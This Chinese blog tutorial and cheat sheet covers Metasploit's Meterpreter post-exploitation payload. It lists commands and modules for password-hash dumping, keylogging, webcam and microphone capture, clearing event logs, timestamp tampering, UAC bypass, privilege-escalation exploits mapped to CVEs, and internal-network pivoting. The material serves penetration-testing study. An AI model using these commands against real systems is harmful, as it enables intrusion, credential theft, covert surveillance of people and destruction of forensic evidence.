meterpreter使用详解

最新推荐文章于 2024-05-21 12:39:00 发布
最新推荐文章于 2024-05-21 12:39:00 发布
阅读量3.4k 收藏 38
点赞数 6
分类专栏: Tools 文章标签: metasploit-framework msf meterpreter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21310689/article/details/86010246
版权

meterpreter使用详解

文章目录

0 meterpreter简介

Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。

Metepreter最初由Metasploit 2.x的skape编写,常见的扩展名合并为3.x,目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现,现在使用MSVC进行编译,使其具有一定的便携性。客户端可以用任何语言编写,但Metasploit具有全功能的Ruby客户端API。

Meterpreter如何工作?

  • 目标执行初始stager。这通常是bind,reverse,findtag,passivex等之一。
  • stager加载以Reflective为前缀的DLL。反射存根处理DLL的加载/注入。
  • Metepreter内核初始化,通过套接字建立TLS / 1.0链接并发送GET。Metasploit接收这个GET并配置客户端。
  • 最后,Meterpreter加载扩展。它将始终加载stdapi,并在模块提供管理权限时加载priv。所有这些扩展都使用TLV协议通过TLS / 1.0加载。

Meterpreter设计目标

隐身

  • Meterpreter完全驻留在内存中,并且不向磁盘写任何内容。
  • 由于Meterpreter将自身注入受损的进程并且可以轻松迁移到其他正在运行的进程,因此不会创建新进程。
  • 默认情况下,Meterpreter使用加密通信。
  • 所有这些提供有限的法医证据和对受害者机器的影响。

强大

  • Meterpreter采用通道化通信系统。
  • TLV协议有一些限制。

扩展

  • 功能可以在运行时扩充并通过网络加载。
  • 可以将新功能添加到Meterpreter,而无需重新构建它。

添加运行时功能

通过加载扩展将新功能添加到Meterpreter。

  • 客户端通过套接字上载DLL。
  • 在受害者上运行的服务器加载内存中的DLL并对其进行初始化。
  • 新的扩展将自己注册到服务器。
  • 攻击者机器上的客户端加载本地扩展API,现在可以调用扩展功能。

整个过程是无缝的,大约需要1秒钟才能完成。

1 meterpreter控制技巧总结

1.1 命令详解

以下为meterpreter帮助信息


Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         帮助文档
    background                将当前meterpreter隐藏到后台
    bg                        同上
    bgkill                    关闭后台运行的meterpreter脚本
    bglist                    列出正在运行的meterpreter脚本
    bgrun                     在后台运行一个meterpreter
    channel                   通信频道
    close                     关闭一个通信通道
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      关闭当前meterpreter会话
    get_timeouts              查询当前会话延迟时间
    guid                      获取当前会话的GUID
    help                      帮助文档
    info                      显示某个POST模块(后渗透模块)的帮助信息
    irb                       在当前会话打开交互式ruby shell
    load                      加载meterpreter扩展,常用mimikatz,kiwi
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                   迁移会话到另一个进程
    pivot                     建立pivot代理,用于打穿内网
    pry                       Open the Pry debugger on the current session
    quit                      同exit
    read                      从某一个通信通道中读取数据
    resource                  执行在某个文件中存储的命令
    run                       执行一个meterpreter脚本或者post(后渗透)模块
    sessions                  快速切换会话
    set_timeouts              设置当前会话的延迟时间
    sleep                     强迫meterpreter静默,然后重新建立连接
    transport                 Change the current transport mechanism
    use                       load的别名
    uuid                      获取当前会话的uuid
    write                     向通信通道中写入数据


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           读取文件内容
    cd            更改工作目录
    checksum      检索文件校验和
    cp            复制
    dir           显示文件目录,同ls
    download      下载文件或目录
    edit          编辑文件
    getlwd        获取本地工作目录
    getwd         获取工作目录
    lcd           改变本地工作目录
    lls           显示本地文件目录
    lpwd          显示本地工作目录
    ls            显示文件目录
    mkdir         新建文件夹
    mv            剪切
    pwd           打印当前文件目录
    rm            删除文件
    rmdir         删除文件夹
    search        查找文件
    show_mount    列出所有挂载的硬盘
    upload        上传


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           显示主机arp缓存
    getproxy      显示当前代理设置
    ifconfig      显示网卡信息
    ipconfig      显示网卡信息
    netstat       显示网络连接
    portfwd       端口转发
    resolve       解析目标主机上的一组主机名,查找ip地址和主机地址对应关系
    route         显示、更改路由表


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       清空时间日志
    drop_token    Relinquishes any active impersonation token.
    execute       执行命令
    getenv        获取环境变量
    getpid        获取当前进程id
    getprivs      尝试获取更多权限
    getsid        获取当前进程的用户id
    getuid        获取uid
    kill          杀进程
    localtime     显示主机当地时间
    pgrep         通过进程名称过滤进程
    pkill         通过名称杀进程
    ps            列出正在运行的进程
    reboot        重启远程主机
    reg           修改远程主机注册表
    rev2self      Calls RevertToSelf() on the remote machine
    shell         打开远程主机shell
    shutdown      关闭远程主机
    steal_token   Attempts to steal an impersonation token from the target proce
ss
    suspend       挂起或唤醒进程
    sysinfo       获取主机系统信息


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   列出所有桌面
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   键盘监听
    keyscan_start  键盘监听
    keyscan_stop   键盘监听
    screenshot     截屏
    setdesktop     改变桌面
    uictl          Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     尝试提高权限


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      dump ash


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     操控文件时间戳

1.2 sessions 控制命令

msf exploit(windows/local/ms16_016_webdav) > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

1.3 meterpreter收集信息

1.3.1 meterpreter 收集windows主机信息
1.3.1.1 收集系统信息

方法一:

shell
systeminfo

方法二:

sysinfo
1.3.1.2 收集本地(域)用户信息
shell
net user
net user /domain
1.3.1.3 收集当前用户信息
shell
whoami /all
1.3.1.4 收集主机所运行的服务
 run service_manager -l
1.3.1.5 查询主机所在地理位置
run post/multi/gather/wlan_geolocate
1.3.1.6 查询arp信息
arp
1.3.1.7 枚举用户
run post/windows/gather/enum_computers
1.3.1.8 读取目标主机的WIFI密码
run post/windows/wlan/wlan_profile
1.3.1.9 监视
run vnc
run sound_recorder
run webcam
1.3.2 meterpreter 收集linux主机信息

1.4 meterpreter 提升权限常用模块

1.4.1 Windows提权
1.4.1.1 绕过UAC进行提权

使用以下模块

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
1.4.1.2 提高程序运行级别(runas)

使用以下模块

exploit/windows/local/ask

该模块实际是使用更高权限运行程序,没有绕过UAC靶机会有响应,一般不使用。

1.4.1.3 利用windows提权漏洞进行提权

使用ms13_053,ms14_058,ms16_016,ms16_032等提权漏洞

对应漏洞补丁编号为

漏洞编号CVE编号补丁编号
ms13_053CVE-2013-3129KB2850851
ms14_058CVE-2014-4148KB3000061
ms16_016CVE-2016-0051KB3019215
ms16_032CVE-2016-0099KB3135174

漏洞利用对应模块(PS.msf版本为metasploit v4.17.24-dev)

漏洞编号msf对应模块
ms13_053exploit/windows/local/ms13_053_schlamperei
ms14_058exploit/windows/local/ms14_058_track_popup_menu
ms16_016exploit/windows/local/ms16_016_webdav
ms16_032exploit/windows/local/ms16_032_secondary_logon_handle_privesc

以上是常用的提权模块,如果以上尝试均失败,请查看漏洞影响的系统版本,以及对应主机中是否安装了月度更新。

1.4.1.4 使用meterpreter命令提权
getsystem
1.4.2 Linux提权

1.5 meterpreter控制逻辑总结

在这里插入图片描述

2 POST 内网渗透总结

2.1 内网穿透

2.1.1 查询主机路由
run get_local_subnets
result:
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 1.22.124.0/255.255.255.0
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > info post/multi/manage/autoroute

       Name: Multi Manage Network Route via Meterpreter Session
     Module: post/multi/manage/autoroute
   Platform:
       Arch:
       Rank: Normal

Provided by:
  todb <todb@metasploit.com>
  Josh Hale "sn0wfa11" <jhale85446@gmail.com>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CMD      autoadd          yes       Specify the autoroute command (Accepted: a
dd, autoadd, print, delete, default)
  NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR a
s "/24"
  SESSION                   yes       The session to run this module on.
  SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

Description:
  This module manages session routing via an existing Meterpreter
  session. It enables other modules to 'pivot' through a compromised
  host when connecting to the named NETWORK and SUBMASK. Autoadd will
  search a session for valid subnets from the routing table and
  interface list then add routes to them. Default will add a default
  route so that all TCP/IP traffic not specified in the MSF routing
  table will be routed through the session when pivoting. See
  documentation for more 'info -d' and click 'Knowledge Base'



Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted:
add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR
as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)
2.1.2 内网主机发现

扫描内网存活主机


run arp_scanner -r x.x.x.x/24
2.1.3 内网主机端口扫描

使用db_nmap

msf中使用的db_nmap实际上实际上使用nmap进行扫描生成xml格式文件,再倒入,因此db_nmap实际上就是nmap.

2.2 后渗透攻击技巧

2.2.3 查询域用户
run domain_list_gen
2.2.4 导出全域hash
hashdump
2.2.5 使用ipc通道访问域内用户
net use

3 感谢

Metasploit 中 Meterpreter 介绍

Metasploit入门系列(九)——Meterpreter(二)

Jacob-liu
关注
  • 6
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Meterpreter使用详解
悦分享
11-23 231
Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。Metepreter最初由Metasploit 2.x的skape编写,常见的扩展名合并为3.x,目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现,现在使用MSVC进行编译,使其具有一定的便携性。
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
weixin_62490257的博客
06-29 3884
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5589
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
meterpreter模块
最新发布
qq_52712762的博客
05-21 519
meterpreter
Meterpreter命令详解
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5606
meterpreter使用攻略(持续更新中)
详尽的msf——meterpreter——渗透测试教程
热门推荐
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 是 Metasploit 框架中的一个高级交互式后渗透工具,它允许渗透测试者在成功利用漏洞后与目标系统进行深度交互,执行多种高级...了解和熟练掌握 Meterpreter使用,是每一位网络安全专业人员的必备技能。
module_meterpreter:FruityWifi Meterpreter 模块
07-05
**Meterpreter模块详解** Meterpreter模块是Metasploit框架的一个核心组件,它是一个远程控制代理,可以在多种操作系统上运行,包括Windows、Linux、Mac OS X等。Meterpreter通过一系列的内置命令提供了丰富的功能...
linux系统安装msf的过程详解
09-14
如果你选择使用传统的包管理系统安装,也可以使用以下命令: ```bash wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run chmod 755 metasploit-latest-linux-installer....
metasploit中文使用指南
08-18
对于初学者,除了阅读"metasploit中文使用详解.pdf"文档外,还可以访问Metasploit官方文档、社区论坛(如exploit-db.com)和在线教程。不断实践和学习新的漏洞利用技术,将有助于提高你在网络安全领域的专业技能。 ...
Metasploit可执行后门.doc
06-25
**Metasploit可执行后门详解** Metasploit是一款广泛使用的渗透测试框架,它允许安全研究人员和渗透测试人员模拟黑客攻击行为,以评估系统和网络的安全性。在文档"Metasploit可执行后门.doc"中,我们看到的是如何...
12、后渗透测试--meterpreter使用
无痕的博客
12-13 1175
metasploit后渗透阶段meterpreter命令
meterpreter常用命令
m0_52421380的博客
08-12 2375
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。可以使用meterpreter自带的功能实现控制对方手机和电脑。nc,全称为NetworkConnection,是一种网络连接的工具,可以用来在两台计算机之间建立网络连接。
meterpreter命令总结
sweetie 的博客
06-03 2968
前言 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。 常用命令 sessions -i 进入会话 sessions -k 杀死会话 pwd 查看当前目录 getuid 查看当前用户信息 sysinfo 查看远程主机系统信息 execute
渗透测试必备工具--Metasploit(流程梳理与meterpreter权限分析)
Welcome To Myon'Blog !
11-10 691
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 # 添加用户。run post/windows/gather/smart_hashdump # 从SAM导出密码哈希,execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互。run post/windows/manage/enable_rdp # 开启远程桌面。ps # 查看当前活跃进程,kill 杀死进程。
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1727
利用meterpreter对win7系统进行提权
Metasploit(一)--Meterpreter的命令速查表
weixin_34167819的博客
08-27 846
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
sourcetree使用详解
08-27
Sourcetree是一个非常好用的git客户端,它提供了可视化的界面帮助开发者进行多人协作开发过程中的各种git操作,比如push、pull、add、commit、merge等等。 在使用Sourcetree之前,你需要先下载、安装和配置好环境。然后你可以打开Sourcetree,它会展示一个初始界面,其中包含了本地仓库的相关信息。 Sourcetree是一个强大的工具,但本文只介绍了一些常用的功能,并没有记录一些使用频率较低的功能。工具的目的是帮助我们提高工作效率,所以我们只需要掌握最有用的部分即可。 在正文部分,你可以了解到Sourcetree的各种功能,以及对应的git命令和如何使用这些功能。它详细介绍了各种常用操作,帮助你更好地使用Sourcetree进行版本控制。[1,2] 使用Sourcetree可以很方便地进行分支的检出和关联远程分支。当你使用命令行检出分支后,你还需要执行一些操作来与远程分支进行关联。但是Sourcetree非常友好,当你点击克隆按钮时,它会自动帮助你与远程仓库进行关联。 总之,Sourcetree是一个功能强大且易于使用的git客户端,它为开发者提供了可视化的界面来管理和执行各种git操作,帮助我们更高效地进行协同开发。[1,2,3]<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Sourcetree 使用详解](https://blog.csdn.net/weixin_43837354/article/details/105936140)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [SourceTree使用教程图文详解](https://blog.csdn.net/qq_41153943/article/details/120814918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值